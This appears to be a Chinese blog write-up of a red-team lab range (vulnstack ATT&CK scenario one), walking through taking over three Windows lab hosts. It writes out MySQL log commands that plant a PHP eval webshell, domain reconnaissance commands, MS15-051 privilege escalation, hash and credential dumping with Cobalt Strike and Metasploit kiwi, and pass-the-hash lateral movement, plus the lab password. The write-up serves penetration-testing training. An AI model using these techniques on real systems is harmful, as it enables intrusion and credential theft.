ATT&CK实战系列-红队评估（一）WP_att&ck红队评估实战靶场一wp

环境配置

靶机下载地址 http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

按要求对三个靶机进行网络环境配置，最终网络拓扑结构如下

win7 外网192.168.133.143/内网 192.168.58.128

win server 2003 内网 192.168.58.141

win server 2008 内网192.168.58.138

按靶场介绍，口令统一为hongrisec@2019


将Win7靶机上的PhpStudy启动后即可开始渗透

渗透流程

0x01 拿下WEB靶机

对端口信息进行探测，发现开启了80端口和3306端口。推测架设了WEB服务和MySQL数据库服务

对WEB端进行目录扫描，可以发现pma和beifen.rar这两个敏感的目录/文件

按正常来说是通过CMS进行Getshell，但这里发现可以MySQL日志GetShell，于是就直接做了

这里需要知道网站的绝对路径，这里是通过访问站点时的PHP探针发现的。除了这个还可以通过尝试或者报错的方式来进行获取。

set global slow_query_log=1;
set global slow_query_log_file='C:\\phpStudy\\WWW\\shell.php'
select '<?php eval($_POST[g]);?>' or sleep(11);
1
2
3

写入后可以拿到WebShell

通过在蚁剑中执行命令下载Payload并上线CS

0x02 域内信息收集

上线后对目标主机进行网络环境的探测，可以发现有域环境存在（必须的

shell ipconfig
shell net time /domain
1
2

接着寻找域控，通过命令

shell nltest /DCLIST:god.org
shell net group "domain admins" /domain
1
2

可以发现域控的主机名为OWA，以及存在的域管理员

在打下来的WEB服务器中架设Pivot

0x02 提权&HashDump

之后使用MS15-051进行提权

提权完成后通过beacon命令

hashdump
1

导出目标机上的Hash

并尝试传递哈希进行横向移动

这里一直尝试失败，几次无果后尝试通过破解Hash的方式进行横向移动，发现是空密码。Windows中的密码一般有LM Hash和NTLM Hash，一般来说LM Hash会被默认禁用，但这里是NTLM Hash，居然也是空密码。这里原因未知，可能是hashdump本身命令的原因，占个坑，将来懂了再来写。

几番尝试后，发现可以使用梼杌导出全部域用户的Hash（使用mimikatz也可以）

这个Hash在后面的测试中是可以传递成功的

之后尝试使用msf进行同样的hashdump操作，msf倒是表现得比较好

load kiwi
creds_all
1
2

0x03 PTH拿下其他机器

之后创建一个smb类型的listener（这里必须要使用smb，不能用http，原因未知）

尝试进行PTH，并将我们拿到的不是空字符串的Hash填入，并配置域名、Listener和Session

点击Launch后就能拿到相应主机的Beacon

对其他机器的渗透同理。进行两次PTH操作后就能拿到所有主机的权限。